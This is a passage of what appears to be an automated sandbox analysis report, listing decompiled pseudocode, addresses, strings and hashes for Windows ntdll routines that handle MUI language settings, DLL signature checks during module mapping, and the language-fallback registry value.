                                                              								_t244 = _t282;
                                                              								_t281 = E04BE1370(_t282, 0x4b74e90);
                                                              								_pop(_t262);
                                                              							} while (_t281 != 0);
                                                              							_v48 = _t244;
                                                              							_t242 = _v52;
                                                              						}
                                                              						_t201 = _v48;
                                                              						_t280 = 0;
                                                              						if( *_v48 != 0) {
                                                              							E04BDBB40(_t262,  &_v68, _t201);
                                                              							if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              								_t279 =  &(_t279[0]);
                                                              							}
                                                              						}
                                                              						if(_t279 == 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                              							_v28 = _t280;
                                                              							_v16 = _t280;
                                                              						}
                                                              						_t202 = _v8;
                                                              						if(_v8 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                              						}
                                                              						_v8 = _t280;
                                                              						goto L28;
                                                              					}
                                                              				}
                                                              				_t214 = _v12;
                                                              				_t264 = _v12 + 4;
                                                              				_v40 = _t264;
                                                              				if(_t264 == 0) {
                                                              					_v20 = _t280;
                                                              				} else {
                                                              					_t236 = L04BB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                              					_t280 = _t236;
                                                              					_v20 = _t236;
                                                              					_t214 = _v12;
                                                              				}
                                                              				if(_t280 == 0) {
                                                              					_t161 = 0;
                                                              					_t280 = 0xc0000017;
                                                              					_v40 = 0;
                                                              					goto L48;
                                                              				} else {
                                                              					E04BDF3E0(_t280, _v8, _t214);
                                                              					_t285 = _t285 + 0xc;
                                                              					_v48 = _t280;
                                                              					_t283 = E04BE1370(_t280, 0x4b74e90);
                                                              					_pop(_t267);
                                                              					if(_t283 != 0) {
                                                              						_t245 = _v48;
                                                              						do {
                                                              							 *_t283 = 0;
                                                              							_t284 = _t283 + 2;
                                                              							E04BDBB40(_t267,  &_v68, _t245);
                                                              							if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              								_t275 = _t275 + 1;
                                                              							}
                                                              							_t245 = _t284;
                                                              							_t283 = E04BE1370(_t284, 0x4b74e90);
                                                              							_pop(_t267);
                                                              						} while (_t283 != 0);
                                                              						_v48 = _t245;
                                                              						_t242 = _v52;
                                                              					}
                                                              					_t224 = _v48;
                                                              					_t280 = 0;
                                                              					if( *_v48 != 0) {
                                                              						E04BDBB40(_t267,  &_v68, _t224);
                                                              						if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              							_t275 = _t275 + 1;
                                                              						}
                                                              					}
                                                              					if(_t275 == 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                              						_v40 = _t280;
                                                              						_v20 = _t280;
                                                              					}
                                                              					_t225 = _v8;
                                                              					if(_v8 != 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                              					}
                                                              					_v8 = _t280;
                                                              					goto L16;
                                                              				}
                                                              			}










































                                                              0x04ba3d3c
                                                              0x04ba3d42
                                                              0x04ba3d44
                                                              0x04ba3d46
                                                              0x04ba3d49
                                                              0x04ba3d4c
                                                              0x04ba3d4f
                                                              0x04ba3d52
                                                              0x04ba3d55
                                                              0x04ba3d58
                                                              0x04ba3d5b
                                                              0x04ba3d5f
                                                              0x04ba3d61
                                                              0x04ba3d66
                                                              0x04bf8213
                                                              0x04bf8218
                                                              0x04ba4085
                                                              0x04ba4088
                                                              0x04ba408e
                                                              0x04ba4094
                                                              0x04ba409a
                                                              0x04ba40a0
                                                              0x04ba40a6
                                                              0x04ba40a9
                                                              0x04ba40af
                                                              0x04ba40b6
                                                              0x04ba40bd
                                                              0x04ba40bd
                                                              0x04ba3d83
                                                              0x04bf821f
                                                              0x04bf8229
                                                              0x04bf8238
                                                              0x04bf8238
                                                              0x04bf823d
                                                              0x04bf823d
                                                              0x04ba3da0
                                                              0x04ba3daf
                                                              0x04ba3db5
                                                              0x04ba3dba
                                                              0x04ba3dba
                                                              0x04ba3dd4
                                                              0x04ba3e94
                                                              0x04ba3eab
                                                              0x04ba3f6d
                                                              0x04ba3f84
                                                              0x04ba406b
                                                              0x04ba406b
                                                              0x04ba406e
                                                              0x04ba406e
                                                              0x04ba4070
                                                              0x04ba4074
                                                              0x04bf8351
                                                              0x04bf8351
                                                              0x04ba407a
                                                              0x04ba407f
                                                              0x04bf835d
                                                              0x04bf8370
                                                              0x04bf8377
                                                              0x04bf8379
                                                              0x04bf837c
                                                              0x04bf837c
                                                              0x04bf835d
                                                              0x00000000
                                                              0x04ba407f
                                                              0x04ba3f8a
                                                              0x04ba3f8d
                                                              0x04ba3f90
                                                              0x04ba3f95
                                                              0x04bf830d
                                                              0x04bf830f
                                                              0x04ba3f9b
                                                              0x04ba3fac
                                                              0x04ba3fae
                                                              0x04ba3fb1
                                                              0x04ba3fb1
                                                              0x04ba3fb6
                                                              0x04bf8317
                                                              0x04bf831a
                                                              0x00000000
                                                              0x04ba3fbc
                                                              0x04ba3fc1
                                                              0x04ba3fc9
                                                              0x04ba3fd7
                                                              0x04ba3fda
                                                              0x04ba3fdd
                                                              0x04ba4021
                                                              0x04ba4021
                                                              0x04ba4029
                                                              0x04ba4030
                                                              0x04ba4044
                                                              0x04ba4046
                                                              0x04ba4046
                                                              0x04ba4044
                                                              0x04ba4049
                                                              0x04bf8327
                                                              0x04bf8334
                                                              0x04bf8339
                                                              0x04bf833c
                                                              0x04ba404f
                                                              0x04ba404f
                                                              0x04ba404f
                                                              0x04ba4051
                                                              0x04ba4056
                                                              0x04ba4063
                                                              0x04ba4063
                                                              0x04ba4068
                                                              0x00000000
                                                              0x04ba4068
                                                              0x04ba3fdf
                                                              0x04ba3fe2
                                                              0x04ba3fe4
                                                              0x04ba3fe7
                                                              0x04ba3fef
                                                              0x04ba4003
                                                              0x04ba4005
                                                              0x04ba4005
                                                              0x04ba400c
                                                              0x04ba4013
                                                              0x04ba4016
                                                              0x04ba4017
                                                              0x04ba401b
                                                              0x04ba401e
                                                              0x00000000
                                                              0x04ba401e
                                                              0x04ba3fb6
                                                              0x04ba3eb1
                                                              0x04ba3eb4
                                                              0x04ba3eb7
                                                              0x04ba3ebc
                                                              0x04bf82a9
                                                              0x04bf82ab
                                                              0x04ba3ec2
                                                              0x04ba3ed3
                                                              0x04ba3ed5
                                                              0x04ba3ed8
                                                              0x04ba3ed8
                                                              0x04ba3edd
                                                              0x04bf82b3
                                                              0x04bf82b6
                                                              0x00000000
                                                              0x04ba3ee3
                                                              0x04ba3ee8
                                                              0x04ba3eed
                                                              0x04ba3ef0
                                                              0x04ba3ef3
                                                              0x04ba3f02
                                                              0x04ba3f05
                                                              0x04ba3f08
                                                              0x04bf82c0
                                                              0x04bf82c3
                                                              0x04bf82c5
                                                              0x04bf82c8
                                                              0x04bf82d0
                                                              0x04bf82e4
                                                              0x04bf82e6
                                                              0x04bf82e6
                                                              0x04bf82ed
                                                              0x04bf82f4
                                                              0x04bf82f7
                                                              0x04bf82f8
                                                              0x04bf82fc
                                                              0x04bf82ff
                                                              0x04bf82ff
                                                              0x04ba3f0e
                                                              0x04ba3f11
                                                              0x04ba3f16
                                                              0x04ba3f1d
                                                              0x04ba3f31
                                                              0x04bf8307
                                                              0x04bf8307
                                                              0x04ba3f31
                                                              0x04ba3f39
                                                              0x04ba3f48
                                                              0x04ba3f4d
                                                              0x04ba3f50
                                                              0x04ba3f50
                                                              0x04ba3f53
                                                              0x04ba3f58
                                                              0x04ba3f65
                                                              0x04ba3f65
                                                              0x04ba3f6a
                                                              0x00000000
                                                              0x04ba3f6a
                                                              0x04ba3edd
                                                              0x04ba3dda
                                                              0x04ba3ddd
                                                              0x04ba3de0
                                                              0x04ba3de5
                                                              0x04bf8245
                                                              0x04ba3deb
                                                              0x04ba3df7
                                                              0x04ba3dfc
                                                              0x04ba3dfe
                                                              0x04ba3e01
                                                              0x04ba3e01
                                                              0x04ba3e06
                                                              0x04bf824d
                                                              0x04bf824f
                                                              0x04bf8254
                                                              0x00000000
                                                              0x04ba3e0c
                                                              0x04ba3e11
                                                              0x04ba3e16
                                                              0x04ba3e19
                                                              0x04ba3e29
                                                              0x04ba3e2c
                                                              0x04ba3e2f
                                                              0x04bf825c
                                                              0x04bf825f
                                                              0x04bf8261
                                                              0x04bf8264
                                                              0x04bf826c
                                                              0x04bf8280
                                                              0x04bf8282
                                                              0x04bf8282
                                                              0x04bf8289
                                                              0x04bf8290
                                                              0x04bf8293
                                                              0x04bf8294
                                                              0x04bf8298
                                                              0x04bf829b
                                                              0x04bf829b
                                                              0x04ba3e35
                                                              0x04ba3e38
                                                              0x04ba3e3d
                                                              0x04ba3e44
                                                              0x04ba3e58
                                                              0x04bf82a3
                                                              0x04bf82a3
                                                              0x04ba3e58
                                                              0x04ba3e60
                                                              0x04ba3e6f
                                                              0x04ba3e74
                                                              0x04ba3e77
                                                              0x04ba3e77
                                                              0x04ba3e7a
                                                              0x04ba3e7f
                                                              0x04ba3e8c
                                                              0x04ba3e8c
                                                              0x04ba3e91
                                                              0x00000000
                                                              0x04ba3e91

                                                              Strings
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 04BA3E97
                                                              • Kernel-MUI-Language-SKU, xrefs: 04BA3F70
                                                              • Kernel-MUI-Number-Allowed, xrefs: 04BA3D8C
                                                              • Kernel-MUI-Language-Allowed, xrefs: 04BA3DC0
                                                              • WindowsExcludedProcs, xrefs: 04BA3D6F
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-258546922
                                                              • Opcode ID: b6e974348f3237e29c930f754fbac07f74ae443d4999a1e873fb63b06e673345
                                                              • Instruction ID: 87742354f8abfef8eefb8ee210a5cb8a9bc63cb0ad90a1fd58090092f3bde3e1
                                                              • Opcode Fuzzy Hash: b6e974348f3237e29c930f754fbac07f74ae443d4999a1e873fb63b06e673345
                                                              • Instruction Fuzzy Hash: 15F13C72D04619EFDB11DF98C980AEEB7B9FF48754F1500AAE905A7210E774BE04DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E04BA7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				signed int _t73;
                                                              				void* _t77;
                                                              				char* _t82;
                                                              				char* _t87;
                                                              				signed char* _t97;
                                                              				signed char _t102;
                                                              				intOrPtr _t107;
                                                              				signed char* _t108;
                                                              				intOrPtr _t112;
                                                              				intOrPtr _t124;
                                                              				intOrPtr _t125;
                                                              				intOrPtr _t126;
                                                              
                                                              				_t107 = __edx;
                                                              				_v12 = __ecx;
                                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                              				_t124 = 0;
                                                              				_v20 = __edx;
                                                              				if(E04BACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                              					_t112 = _v8;
                                                              				} else {
                                                              					_t112 = 0;
                                                              					_v8 = 0;
                                                              				}
                                                              				if(_t112 != 0) {
                                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                              						_t124 = 0xc000007b;
                                                              						goto L8;
                                                              					}
                                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                              					 *(_t125 + 0x34) = _t73;
                                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                              					_t124 = E04B9C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                              					if(_t124 < 0) {
                                                              						goto L8;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                              						L8:
                                                              						return _t124;
                                                              					}
                                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                              							goto L5;
                                                              						}
                                                              						_t102 =  *0x4c85780; // 0x0
                                                              						if((_t102 & 0x00000003) != 0) {
                                                              							E04C15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                              							_t102 =  *0x4c85780; // 0x0
                                                              						}
                                                              						if((_t102 & 0x00000010) != 0) {
                                                              							asm("int3");
                                                              						}
                                                              						_t124 = 0xc0000428;
                                                              						goto L8;
                                                              					}
                                                              					L5:
                                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                              						goto L8;
                                                              					}
                                                              					_t77 = _a4 - 0x40000003;
                                                              					if(_t77 == 0 || _t77 == 0x33) {
                                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                              						if(E04BB7D50() != 0) {
                                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              						} else {
                                                              							_t82 = 0x7ffe0384;
                                                              						}
                                                              						_t108 = 0x7ffe0385;
                                                              						if( *_t82 != 0) {
                                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                              								if(E04BB7D50() == 0) {
                                                              									_t97 = 0x7ffe0385;
                                                              								} else {
                                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              								}
                                                              								if(( *_t97 & 0x00000020) != 0) {
                                                              									E04C17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                              								}
                                                              							}
                                                              						}
                                                              						if(_a4 != 0x40000003) {
                                                              							L14:
                                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                              							if(E04BB7D50() != 0) {
                                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              							} else {
                                                              								_t87 = 0x7ffe0384;
                                                              							}
                                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                              								if(E04BB7D50() != 0) {
                                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              								}
                                                              								if(( *_t108 & 0x00000020) != 0) {
                                                              									E04C17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                              								}
                                                              							}
                                                              							goto L8;
                                                              						} else {
                                                              							_v16 = _t125 + 0x24;
                                                              							_t124 = E04BCA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                              							if(_t124 < 0) {
                                                              								E04B9B1E1(_t124, 0x1490, 0, _v16);
                                                              								goto L8;
                                                              							}
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						goto L8;
                                                              					}
                                                              				}
                                                              			}




















                                                              0x04ba7e4c
                                                              0x04ba7e50
                                                              0x04ba7e55
                                                              0x04ba7e58
                                                              0x04ba7e5d
                                                              0x04ba7e71
                                                              0x04ba7f33
                                                              0x04ba7e77
                                                              0x04ba7e77
                                                              0x04ba7e79
                                                              0x04ba7e79
                                                              0x04ba7e7e
                                                              0x04ba7f45
                                                              0x04bf9848
                                                              0x00000000
                                                              0x04bf9848
                                                              0x04ba7f4e
                                                              0x04ba7f53
                                                              0x04ba7f5a
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf985a
                                                              0x04bf9862
                                                              0x04bf9866
                                                              0x00000000
                                                              0x04bf986c
                                                              0x00000000
                                                              0x04bf986c
                                                              0x04ba7e84
                                                              0x04ba7e84
                                                              0x04ba7e8d
                                                              0x04bf9871
                                                              0x04ba7eb8
                                                              0x04ba7ec0
                                                              0x04ba7ec0
                                                              0x04ba7e9a
                                                              0x04bf987e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf9884
                                                              0x04bf988b
                                                              0x04bf98a7
                                                              0x04bf98ac
                                                              0x04bf98b1
                                                              0x04bf98b6
                                                              0x04bf98b8
                                                              0x04bf98b8
                                                              0x04bf98b9
                                                              0x00000000
                                                              0x04bf98b9
                                                              0x04ba7ea0
                                                              0x04ba7ea7
                                                              0x00000000
                                                              0x00000000
                                                              0x04ba7eac
                                                              0x04ba7eb1
                                                              0x04ba7ec6
                                                              0x04ba7ed0
                                                              0x04bf98cc
                                                              0x04ba7ed6
                                                              0x04ba7ed6
                                                              0x04ba7ed6
                                                              0x04ba7ede
                                                              0x04ba7ee3
                                                              0x04bf98e3
                                                              0x04bf98f0
                                                              0x04bf9902
                                                              0x04bf98f2
                                                              0x04bf98fb
                                                              0x04bf98fb
                                                              0x04bf9907
                                                              0x04bf991d
                                                              0x04bf991d
                                                              0x04bf9907
                                                              0x04bf98e3
                                                              0x04ba7ef0
                                                              0x04ba7f14
                                                              0x04ba7f14
                                                              0x04ba7f1e
                                                              0x04bf9946
                                                              0x04ba7f24
                                                              0x04ba7f24
                                                              0x04ba7f24
                                                              0x04ba7f2c
                                                              0x04bf996a
                                                              0x04bf9975
                                                              0x04bf9975
                                                              0x04bf997e
                                                              0x04bf9993
                                                              0x04bf9993
                                                              0x04bf997e
                                                              0x00000000
                                                              0x04ba7ef2
                                                              0x04ba7efc
                                                              0x04ba7f0a
                                                              0x04ba7f0e
                                                              0x04bf9933
                                                              0x00000000
                                                              0x04bf9933
                                                              0x00000000
                                                              0x04ba7f0e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04ba7eb1

                                                              Strings
                                                              • LdrpCompleteMapModule, xrefs: 04BF9898
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 04BF98A2
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 04BF9891
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              • Opcode ID: a43bca24654c13e2504c20a8b267b8533aa410f7a0433296fdcbdea95be0dbf7
                                                              • Instruction ID: 9e2de78b7ae8201febb1fe54af87fb95f3510887ca0b1e3c3d20128842abf46d
                                                              • Opcode Fuzzy Hash: a43bca24654c13e2504c20a8b267b8533aa410f7a0433296fdcbdea95be0dbf7
                                                              • Instruction Fuzzy Hash: 33510F71B087819BEB21CF68C844B6ABBE8EB41314F0449E9E9559B7E1DB70FD10CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04B9E620(void* __ecx, short* __edx, short* _a4) {
                                                              				char _v16;
                                                              				char _v20;
                                                              				intOrPtr _v24;
                                                              				char* _v28;
                                                              				char _v32;
                                                              				char _v36;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				intOrPtr _v52;
                                                              				void* _v56;
                                                              				void* _v60;
                                                              				char _v64;
                                                              				void* _v68;
                                                              				void* _v76;
                                                              				void* _v84;
                                                              				signed int _t59;
                                                              				signed int _t74;
                                                              				signed short* _t75;
                                                              				signed int _t76;
                                                              				signed short* _t78;
                                                              				signed int _t83;
                                                              				short* _t93;
                                                              				signed short* _t94;
                                                              				short* _t96;
                                                              				void* _t97;
                                                              				signed int _t99;
                                                              				void* _t101;
                                                              				void* _t102;
                                                              
                                                              				_t80 = __ecx;
                                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                              				_t96 = __edx;
                                                              				_v44 = __edx;
                                                              				_t78 = 0;
                                                              				_v56 = 0;
                                                              				if(__ecx == 0 || __edx == 0) {
                                                              					L28:
                                                              					_t97 = 0xc000000d;
                                                              				} else {
                                                              					_t93 = _a4;
                                                              					if(_t93 == 0) {
                                                              						goto L28;
                                                              					}
                                                              					_t78 = E04B9F358(__ecx, 0xac);
                                                              					if(_t78 == 0) {
                                                              						_t97 = 0xc0000017;
                                                              						L6:
                                                              						if(_v56 != 0) {
                                                              							_push(_v56);
                                                              							E04BD95D0();
                                                              						}
                                                              						if(_t78 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                              						}
                                                              						return _t97;
                                                              					}
                                                              					E04BDFA60(_t78, 0, 0x158);
                                                              					_v48 = _v48 & 0x00000000;
                                                              					_t102 = _t101 + 0xc;
                                                              					 *_t96 = 0;
                                                              					 *_t93 = 0;
                                                              					E04BDBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                              					_v36 = 0x18;
                                                              					_v28 =  &_v44;
                                                              					_v64 = 0;
                                                              					_push( &_v36);
                                                              					_push(0x20019);
                                                              					_v32 = 0;
                                                              					_push( &_v64);
                                                              					_v24 = 0x40;
                                                              					_v20 = 0;
                                                              					_v16 = 0;
                                                              					_t97 = E04BD9600();
                                                              					if(_t97 < 0) {
                                                              						goto L6;
                                                              					}
                                                              					E04BDBB40(0,  &_v36, L"InstallLanguageFallback");
                                                              					_push(0);
                                                              					_v48 = 4;
                                                              					_t97 = L04B9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                              					if(_t97 >= 0) {
                                                              						if(_v52 != 1) {
                                                              							L17:
                                                              							_t97 = 0xc0000001;
                                                              							goto L6;
                                                              						}
                                                              						_t59 =  *_t78 & 0x0000ffff;
                                                              						_t94 = _t78;
                                                              						_t83 = _t59;
                                                              						if(_t59 == 0) {
                                                              							L19:
                                                              							if(_t83 == 0) {
                                                              								L23:
                                                              								E04BDBB40(_t83, _t102 + 0x24, _t78);
                                                              								if(L04BA43C0( &_v48,  &_v64) == 0) {
                                                              									goto L17;
                                                              								}
                                                              								_t84 = _v48;
                                                              								 *_v48 = _v56;
                                                              								if( *_t94 != 0) {
                                                              									E04BDBB40(_t84, _t102 + 0x24, _t94);
                                                              									if(L04BA43C0( &_v48,  &_v64) != 0) {
                                                              										 *_a4 = _v56;
                                                              									} else {
                                                              										_t97 = 0xc0000001;
                                                              										 *_v48 = 0;
                                                              									}
                                                              								}
                                                              								goto L6;
                                                              							}
                                                              							_t83 = _t83 & 0x0000ffff;
                                                              							while(_t83 == 0x20) {
                                                              								_t94 =  &(_t94[1]);
                                                              								_t74 =  *_t94 & 0x0000ffff;
                                                              								_t83 = _t74;
                                                              								if(_t74 != 0) {
                                                              									continue;
                                                              								}
                                                              								goto L23;
                                                              							}
                                                              							goto L23;
                                                              						} else {
                                                              							goto L14;
                                                              						}
                                                              						while(1) {
                                                              							L14:
                                                              							_t27 =  &(_t94[1]); // 0x2
                                                              							_t75 = _t27;
                                                              							if(_t83 == 0x2c) {
                                                              								break;
                                                              							}
                                                              							_t94 = _t75;
                                                              							_t76 =  *_t94 & 0x0000ffff;
                                                              							_t83 = _t76;
                                                              							if(_t76 != 0) {
                                                              								continue;
                                                              							}
                                                              							goto L23;
                                                              						}
                                                              						 *_t94 = 0;
                                                              						_t94 = _t75;
                                                              						_t83 =  *_t75 & 0x0000ffff;
                                                              						goto L19;
                                                              					}
                                                              				}
                                                              			}































                                                              0x04b9e620
                                                              0x04b9e628
                                                              0x04b9e62f
                                                              0x04b9e631
                                                              0x04b9e635
                                                              0x04b9e637
                                                              0x04b9e63e
                                                              0x04bf5503
                                                              0x04bf5503
                                                              0x04b9e64c
                                                              0x04b9e64c
                                                              0x04b9e651
                                                              0x00000000
                                                              0x00000000
                                                              0x04b9e661
                                                              0x04b9e665
                                                              0x04bf542a
                                                              0x04b9e715
                                                              0x04b9e71a
                                                              0x04b9e71c
                                                              0x04b9e720
                                                              0x04b9e720
                                                              0x04b9e727
                                                              0x04b9e736
                                                              0x04b9e736
                                                              0x04b9e743
                                                              0x04b9e743
                                                              0x04b9e673
                                                              0x04b9e678
                                                              0x04b9e67d
                                                              0x04b9e682
                                                              0x04b9e685
                                                              0x04b9e692
                                                              0x04b9e69b
                                                              0x04b9e6a3
                                                              0x04b9e6ad
                                                              0x04b9e6b1
                                                              0x04b9e6b2
                                                              0x04b9e6bb
                                                              0x04b9e6bf
                                                              0x04b9e6c0
                                                              0x04b9e6c8
                                                              0x04b9e6cc
                                                              0x04b9e6d5
                                                              0x04b9e6d9
                                                              0x00000000
                                                              0x00000000
                                                              0x04b9e6e5
                                                              0x04b9e6ea
                                                              0x04b9e6f9
                                                              0x04b9e70b
                                                              0x04b9e70f
                                                              0x04bf5439
                                                              0x04bf545e
                                                              0x04bf545e
                                                              0x00000000
                                                              0x04bf545e
                                                              0x04bf543b
                                                              0x04bf543e
                                                              0x04bf5440
                                                              0x04bf5445
                                                              0x04bf5472
                                                              0x04bf5475
                                                              0x04bf548d
                                                              0x04bf5493
                                                              0x04bf54a9
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf54ab
                                                              0x04bf54b4
                                                              0x04bf54bc
                                                              0x04bf54c8
                                                              0x04bf54de
                                                              0x04bf54fb
                                                              0x04bf54e0
                                                              0x04bf54e6
                                                              0x04bf54eb
                                                              0x04bf54eb
                                                              0x04bf54de
                                                              0x00000000
                                                              0x04bf54bc
                                                              0x04bf5477
                                                              0x04bf547a
                                                              0x04bf5480
                                                              0x04bf5483
                                                              0x04bf5486
                                                              0x04bf548b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf548b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf5447
                                                              0x04bf5447
                                                              0x04bf5447
                                                              0x04bf5447
                                                              0x04bf544e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf5450
                                                              0x04bf5452
                                                              0x04bf5455
                                                              0x04bf545a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf545c
                                                              0x04bf546a
                                                              0x04bf546d
                                                              0x04bf546f
                                                              0x00000000
                                                              0x04bf546f
                                                              0x04b9e70f

                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04B9E68C
                                                              • InstallLanguageFallback, xrefs: 04B9E6DB
                                                              • @, xrefs: 04B9E6C0
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                              • API String ID: 0-1757540487
                                                              • Opcode ID: e37d331cff04af1b3cb21bfdcb5759a088ec5eebbf3f31cb57e140b7c5bf6a45
                                                              • Instruction ID: 99f5e9a98d0eafcfcd0d466eb8a5233ec2fdb436677f280d08907b1076a915db
                                                              • Opcode Fuzzy Hash: e37d331cff04af1b3cb21bfdcb5759a088ec5eebbf3f31cb57e140b7c5bf6a45
                                                              • Instruction Fuzzy Hash: 3B516371508355ABDB24DF64C840A6BB3E8EF88715F0549AEF989D7250F734FD0887A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E04B9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                              				signed int _t65;
                                                              				signed short _t69;
                                                              				intOrPtr _t70;
                                                              				signed short _t85;
                                                              				void* _t86;
                                                              				signed short _t89;
                                                              				signed short _t91;
                                                              				intOrPtr _t92;
                                                              				intOrPtr _t97;
                                                              				intOrPtr* _t98;
                                                              				signed short _t99;
                                                              				signed short _t101;
                                                              				void* _t102;
                                                              				char* _t103;
                                                              				signed short _t104;
                                                              				intOrPtr* _t110;
                                                              				void* _t111;
                                                              				void* _t114;
                                                              				intOrPtr* _t115;
                                                              
                                                              				_t109 = __esi;
                                                              				_t108 = __edi;
                                                              				_t106 = __edx;
                                                              				_t95 = __ebx;
                                                              				_push(0x90);
                                                              				_push(0x4c6f7a8);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                              				if(__edx == 0xffffffff) {
                                                              					L6:
                                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                              					__eflags = _t65 & 0x00000002;
                                                              					if((_t65 & 0x00000002) != 0) {
                                                              						L3:
                                                              						L4:
                                                              						return E04BED130(_t95, _t108, _t109);
